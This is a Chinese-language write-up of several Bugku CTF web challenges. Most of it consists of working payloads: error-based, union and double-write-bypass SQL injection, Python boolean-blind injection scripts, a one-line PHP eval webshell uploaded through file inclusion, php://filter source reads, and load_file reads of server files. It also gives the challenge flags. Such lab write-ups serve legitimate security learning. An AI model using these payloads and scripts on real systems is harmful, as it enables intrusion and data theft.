Bugkuctf中的Web题解(三)

这是一个神奇的登录框

网址:http://120.24.86.145:9001/sql/

看到登录框,网址又有sql,八成就是sql注入

试一下用户名输入admin’,没有报错,再试试admin”

发现报错了,果然存在sql注入,从报错信息就看出来用户名和密码都被双引号包裹

那么我们就可以用万能密码登录了

payloads:admin_name=admin&admin_passwd=1” or “1”=”1&submit=GO+GO+GO

应该是登录成功了,但是要我们换一个身份登录才能拿到flag

换个payloads:admin_name=AdMiNhEhE&admin_passwd=1” or “1”=”1&submit=GO+GO+GO

结果还是一样的,看来是只返回了用户名的信息,那干脆就直接利用报错注入注出信息试试

先爆库

payloads:admin_name=admin” and extractvalue(1,concat(0x3a,database(),0x3a))#&admin_passwd=&submit=GO+GO+GO

库名bugkusql1

爆表

payloads:admin_name=admin” and extractvalue(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3a))#&admin_passwd=&submit=GO+GO+GO

表名为flag1,whoami

爆flag1表下的列名

payloads:admin_name=admin” and extractvalue(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=’flag1’),0x3a))#&admin_passwd=&submit=GO+GO+GO

列名为flag1

最后爆flag1列下的数据

payloads:admin_name=admin” and extractvalue(1,concat(0x3a,(select group_concat(flag1) from flag1),0x3a))#&admin_passwd=&submit=GO+GO+GO

试一下这个是不是flag,发现错误,仔细看才发现flag太长了报错信息没显示全…

那再试试爆whoami表吧,看看能不能爆出密码

先爆whoami表下的列名:

payloads:admin_name=admin” and extractvalue(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=’whoami’),0x3a))#&admin_passwd=&submit=GO+GO+GO

列名为w_id,w_name,w_passwd

爆passwd

payloads:admin_name=admin” and extractvalue(1,concat(0x3a,(select w_passwd from whoami where w_name=’AdMiNhEhE’),0x3a))#&admin_passwd=&submit=GO+GO+GO

发现又太长了…

仔细一想,用万能密码登录时也是有返回信息的,为什么不用联合注入呢…

查询列数为2

payloads:admin_name=0” union select flag1,2 from flag1 #&admin_passwd=&submit=GO+GO+GO

输入flag{ed6b28e684817d9efcaf802979e57aea},成功

多次

网址:http://120.24.86.145:9004/

一进去页面发现url:http://120.24.86.145:9004/1ndex.php?id=1

就尝试修改id值,id=1,2,3,4,5到5的时候提示

存在sql注入漏洞,猜测是数字型注入,注入点是id

那试一下id=1’,显示error

猜测可能id被单引号包裹,输入id=1’%23,正确显示信息,那么接下来注出查询列数

输入id=1’ order by 3%23,显示error,将3改为2,又eroor,改为1,还是error,慌了…估计是把order 或者by给过滤了

试一下输入id=1’ ^ (length(‘order’)!=0)%23,显示error,说明不是order被过滤

再试一下输入id=1’ ^ (length(‘or’)!=0)%23

发现正确显示信息,说明or被过滤掉了,类似再尝试一下关键词and,select,union,发现都被过滤了

尝试一下双写可不可以绕过,输入id=1’ oorrder by 2%23

正确显示信息,说明可能是用函数str_replace进行过滤,那么双写即可绕过

输入id=1’ oorrder by 3%23,显示error,说明查询列数为2

接下来就是熟悉爆库

输入id=0’ uunionnion sselectelect 1,database()%23

数据库名:web1002-1

爆表名

输入id=0’ uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()%23

表名:flag1,hint

爆列名

输入id=0’ uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name=’flag1’%23

列名:flag1,address

爆flag列下的数据

输入id=0’ uunionnion sselectelect 1,flag1 from flag1%23

提交flag{usOwycTju+FTUUzXosjr}发现错误,突然发现提交的地方提示我们flag有两个

就试着注出address列下的数据

输入id=0’ uunionnion sselectelect 1,address from flag1%23

好像发现了新大陆

点击访问下一关

页面的url提示oncemore,并且get参数又是id,猜测还是sql注入

输入id=1’

恩?好像隐约看到了报错信息,不过被背景挡住了,没事,看一下源代码

惊喜发现有报错信息,同时也看出来id被单引号包裹,接着试着注出查询列数

输入id=1’ order by 2%23,正常显示信息,输入id=1’ order by 3%23,报错。所以查询列数为2

接下来注库名

输入id=0’ union select 1,database()%23

发现union被过滤了,试着双写,没办法绕过

于是尝试extractvalue报错注入

输入id=1’ and extractvalue(1,concat(0x3a,database(),0x3a))%23

成功注入库名:web1002-2

输入id=1’ and extractvalue(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x3a))%23

表名:class,flag2

输入id=1’ and extractvalue(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=’flag2’),0x3a))%23

flag2表下列名:flag2,address

输入id=1’ and extractvalue(1,concat(0x3a,(select flag2 from flag2),0x3a))%23

注出flag:flag{Bugku-sql_6s-2i-4t-bug}

将B改成小写b,提交成功

PHP_encrypt_1(ISCCCTF)

这题直接给了一个php源文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
function encrypt($data,$key)
{
$key = md5('ISCC');
$x = 0;
$len = strlen($data);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
}
return base64_encode($str);
}
?>
output: fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

(PS:可能题目文件出了问题,output没有写在源文件中)

审计后发现是一个加密的过程,给了最后的输出,需要我们自己编写解密的过程,根据加密的过程一步步解密,decrypt代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php

function decrypt($str){
$str = base64_decode($str); // 将encrypt最后的base64加密后的结果进行base64解密
$key = md5('ISCC'); // 对应encrypt的$key
$x = 0; // 对应encrypt的$x
$len = strlen($str); // $最后encrypt得到的$str长度跟原本encrypt传入的$data长度是一致的
$klen = strlen($key); // 对应encrypt的$klen
$char = ''; // 对应encrypt的$char
$data = ''; // 对应encrypt的$data
for($i = 0; $i < $len; $i++){ //对应encrypt的$char赋值过程
if($x == $klen){
$x = 0;
}
$char .= $key[$x];
$x += 1;
}
for($i = 0; $i < $len; $i++){ // 获得$data
if(ord($str[$i]) < ord($char[$i])){ // 如果$str的某位的ascii值小于$char的某位的ascii值
$data .= chr((ord($str[$i]) + 128) - ord($char[$i])); // 说明encrypt有求余128
}
else{
$data .= chr(ord($str[$i]) - ord($char[$i]));
}
}
return $data;
}

$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
$data = decrypt($str);
echo $data;

?>

最后获得flag

文件包含2

网址:http://118.89.219.210:49166/

页面url:http://118.89.219.210:49166/index.php?file=hello.php

熟悉的文件包含,试一下利用php://filter读取index.php源码

天真!!!看来貌似过滤了什么,试一下读取hellp.php,还是一样的结果,看来这个方法行不通,怎么办呢,这时候看一下失败页面的源码

发现提示了文件upload.php

访问http://118.89.219.210:49166/upload.php

发现是文件上传,要求只能上传图片文件,burp抓包上传一句话试试

发现过滤了文件名和类型,但是因为有文件包含,我们只要能将一句话包含在文件上传上去就行,将php文件后缀修改为png,文件类型修改为image/png,上传成功后访问图片所在地址

可以看到代码显示了出来,说明是不符合php语法的代码,仔细看发现php代码开头的<?php ?>被过滤了

那么换一种方法,上传代码为<?=@eval($_POST[‘cmd’]);

上传成功,访问页面为空,说明代码成功执行

然后再用burp POST参数cmd执行命令

访问this_is_th3_F14g_154f65sd4g35f4d6f43.txt

获得flag

flag.php

网址:http://120.24.86.145:8002/flagphp/

点击页面Login按钮没反应,看一下源代码只是个按钮,用burp试着POST提交user和password参数也没有显示其他的东西,想到题目给的提示:hint,试着访问hint.php,没有结果,题目是flag.php,访问,也没有提示

一番思考,试着GET参数hint,没想到就给出了源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php 
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?>

那就变成一道代码审计题了,要我们在COOKIE字段中添加ISecer参数,值是$KEY序列化后的值

先写个demo,把$KEY序列化后的值打印出来

1
2
3
4
5
6
7
<?php

$KEY = 'ISecer:www.isecer.com';
$cookie = serialize($KEY);
echo $cookie;

?>

然后用burp提交cookie

没反应…很奇怪,想了很久,看了好久源代码才发现,$KEY值是定义在最后面的,前面是为空的,所以应该提交空字符串的序列化值…很坑

空字符串序列化值:s:0:””;

再次burp提交

拿到flag

报错注入

网址:http://103.238.227.13:10088/

根据题目的提示,这是一个数字型注入,注入点为GET的参数id,过滤了关键词:空格,单引号,双引号,union,–

空格可以用%0a替代,union被过滤了那么就用题目的意思:报错注入,注释可以用%23代替–

直接输入?id=1%23试试

发现正常显示,那么id就没有被引号包裹,其实就无所谓单双引号被过滤了

那么我们就可以开始爆库了,输入:

?id=1%0aand%0aextractvalue(1,concat(0x3a,database(),0x3a))%23

数据库名为sql4

爆表,输入?id=1%0aand%0aextractvalue(1,concat(0x3a,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()),0x3a))%23

表名为temp

爆列,输入?id=1%0aand%0aextractvalue(1,concat(0x3a,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name=0x74656d70),0x3a))%23

列名为id,title

爆数据,输入?id=1%0aand%0aextractvalue(1,concat(0x3a,(select%0agroup_concat(title)%0afrom%0atemp),0x3a))%23

没发现flag…

说明flag不在数据库里,回到题目页面,又看到了提示,查询文件在/var/test/key_1.php

说明可能要用mysql的load_file函数读取文件内容,再通过hex函数转化为十六进制数

输入?id=1%0aand%0aextractvalue(1,concat(0x3a,hex(load_file(0x2f7661722f746573742f6b65795f312e706870)),0x3a))%23

可以看到没有全部读取,这就是extractvalue函数的缺点,只能读取32位

这时候就需要利用substr函数每次截取30位读

先读取前30位

输入?id=1%0aand%0aextractvalue(1,concat(0x3a,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870)),1,30),0x3a))%23

再读取31~60位,输入?id=1%0aand%0aextractvalue(1,concat(0x3a,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870)),31,30),0x3a))%23

依次类推

最后得到298位十六进制数

1
3C3F70687020666473616661736664736166696473616664736169666473616B666473616966647361666473616664736166647361666B6473613B6664736166647361667364616664736166617330686664736739466C61673A22373234396635613766643164653630326233306536663339616561363139336122667364616673616664736166647361666473616661203F3E0A

转化成字符串得:

1
<?php fdsafasfdsafidsafdsaifdsakfdsaifdsafdsafdsafdsafkdsa;fdsafdsafsdafdsafas0hfdsg9Flag:"7249f5a7fd1de602b30e6f39aea6193a"fsdafsafdsafdsafdsafa ?>

得到 Flag:”7249f5a7fd1de602b30e6f39aea6193a”

login3(SKCTF)

网址:http://118.89.219.210:49167/

登录界面,随便输入一个用户名1,密码1,提示用户名不存在,输入admin,密码1,提示密码错误,猜测有检查用户名是否存在的判断,猜测注入点在admin,输入admin’,提示用户不存在,输入admin’#,提示密码错误,很显然admin被单引号包裹

那么理清思路,这是字符型注入,注入点在admin,admin被单引号包裹,题目提示我们这是一题基于布尔的盲注

那么我们试试输入admin’ and 1=1#,发现提示了出现非法字符,oh no ,我们直接输入and,同样提示出现非法字符,看来and被过滤了,那不用and了,我们用异或^

输入admin’^1#,提示用户名不存在,输入admin’^0#,提示密码错误,很好,那么就可以利用这个提示信息进行基于布尔的盲注

接下来就是搞定逻辑语句了,正常来说我们是用语句ascii(substr(database(),1,1))=数字,但是尝试就发现了,这题还过滤了逗号,等号,等号可以用不等号<>代替,那么用ascii(substr(database() from 1 for 1))=数字,这样可以吗,又发现for和空格被过滤了…

怎么办,借鉴了别人的思路,才发现mysql用ascii的参数是一个字符串时,会只计算字符串第一位的ascii值

如图所示,语句ascii(substr(database()from(1)))就可以输出数据库名第一位的ascii值

那么思路就很清晰了,根据输入admin’^(ascii(substr(database()from(数字1)))<>数字2)#,根据返回的信息,如果返回了”password error!” ,说明数字2就是数据库的第数字1位的ascii值

直接上脚本,注出数据库名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests

url = 'http://118.89.219.210:49167/index.php'
all_string = '''1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
database = ''
for i in range(1,11):
for j in all_string:
print('checking '+j)
data = {
'username':"admin'^(ascii(substr(database()from(%d)))<>%d)#"%(i,ord(j)),
'password':'1',
'submit':'Log In'
}
r = requests.post(url,data=data)
if 'password error!' in r.text:
database = database + j
print('the '+str(i)+' place of database is '+j)
break
if j == 'M' and 'username does not exist!' in r.text:
break
print(database)

数据库名:blindsql

本来按这个思路可以继续注表名的,但是发现information被过滤了,无奈,表和列名好像只能靠猜

看别人猜的表名为admin,列名为password,真是玄学…

那就直接爆password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests

url = 'http://118.89.219.210:49167/index.php'
all_string = '''1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
password = ''
for i in range(1,51):
for j in all_string:
print('checking '+j)
data = {
'username':"admin'^(ascii(substr((select(password)from(admin))from(%d)))<>%d)#"%(i,ord(j)),
'password':'1',
'submit':'Log In'
}
r = requests.post(url,data=data)
if 'password error!' in r.text:
password = password + j
print('the '+str(i)+' place of password is '+j)
break
if j == 'M' and 'username does not exist!' in r.text:
break
print(password)

得password:51b7a76d51e70b419f60d3473fb6f900

还得拿去md5解密,解密得skctf123456

获得flag

网站被黑

网址:http://120.24.86.145:8002/webshell/

啥提示都没有,只有url有个提示webshell,试着扫一下后台

发现shell.php

进去要输入密码才能看到flag,不是sql,只能burp爆破密码,爆破出来密码是hack

Trim的日记本

网址:http://120.24.86.145:9002/

看着像是sql二次注入,但是死活找不到注入点,id一直不知道处理,试着扫一下后台

访问一下show.php

直接给出了flag

文件上传2

网址:http://120.24.86.145:9011/

看页面像是文件上传,但是尝试上传png文件,jpg文件都上传不了,再看看url有个op参数,看着有点像是文件包含,试着用php伪协议读一下文件看看能不能读出来,payloads:

http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=index

这里不用加php后缀名,读出了index.php的base64源码

base64解码得

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
error_reporting(0);
define('FROM_INDEX', 1);

$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');

function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
<div id="header">
<center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center>
</div>
<div id="body">
<?php
}

function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}

function page_bottom() {
?>
</div>
<center>
<div id="footer">
<div>
<p>
<span>2017 &copy; </span> All rights reserved.
</p>
</div>
</div>
</center>
</body>
</html><?php
ob_end_flush();
}

register_shutdown_function('page_bottom');

page_top($op);

if(!(include $op . '.php'))
fatal('no such page');
?>

再读取home.php,http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=home

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
include 'common.php';
?>
<center>
<div class="article">
<h2>Welcome!!</h2>
<p>
We let you upload PNG image files and store it!<br/>
</p>
<p>
Get started by <a href="?op=upload">uploading a picture</a>
</p>

</div>
</center>

发现又包含了common.php,不急,先读upload.php的源代码,http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=upload.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
include 'common.php';

if(isset($_POST['submit']) && isset($_FILES['image'])) {
$fn = $_FILES['image']['tmp_name'];
$ft = $_FILES['image']['type'];

if(!is_uploaded_file($fn)) {
fatal('uploaded file corrupted');
}

$array = array('image/png');
if(!in_array($ft,$array)){
fatal("Sorry, only PNG files are allowed.");
}

$imagekey = create_image_key();

move_uploaded_file($fn, "uploads/$imagekey.png");

header("Location: ?op=show&imagekey=$imagekey");

} else {
?>
<center>
<div class="article">
<h2>Upload your own png file</h2>
<form enctype="multipart/form-data" action="?op=upload" method="POST">
<label for="image">Image file (max <?=MAX_IM_SIZE;?>x<?=MAX_IM_SIZE;?>): </label>
<input type="file" id="image" name="image" />
<br />
<input type="submit" name="submit" value="Upload!" />
</form>
</div>
</center>
<?php
}
?>

再看一下common.php,http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=common

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
if(!defined('FROM_INDEX')) die();

define('MAX_IM_SIZE', 100);

function create_image_key() {
return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand());
}

function load_image($imagekey) {
if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) {
fatal('Invalid image key.');
}

$im = imagecreatefrompng("uploads/{$imagekey}.png");
if(!$im) {
fatal('Failed to load image.');
}
return $im;
}
stream_wrapper_unregister ("zip");
?>

可以看出我们上传文件首先对上传文件类型进行检查,检查是不是png类型的文件,如果是,则重定向到show.php

那么我们再看看show.php的源代码

http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=show

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
include 'common.php';

if(empty($_GET['imagekey'])) {
header('Location: ?op=home');
exit();
}

$imagekey = $_GET['imagekey'];
$im = load_image($imagekey);

$w = imagesx($im);
$h = imagesy($im);
if($w > MAX_IM_SIZE || $h > MAX_IM_SIZE)
fatal("Invalid image dimensions.");

?>
<center>
<div class="article">
<h2></h2>
<p><img src="uploads/<?=$imagekey;?>.png" />
<div>
<a href="uploads/<?=$imagekey;?>.png">View saved image</a>
</div>
</div>
</center>

看不出所以然,即使最后上传成功文件,也没显示flag,那么直接输入op=flag,发现没有提示错误,说明有这个文件,那么就同样利用php://filter读取源代码

http://120.24.86.145:9011/?op=php://filter/read=convert.base64-encode/resource=flag

解码得

1
2
3
<?php 
$flag="flag{e00f8931037cbdb25f6b1d82dfe5552f}";
?>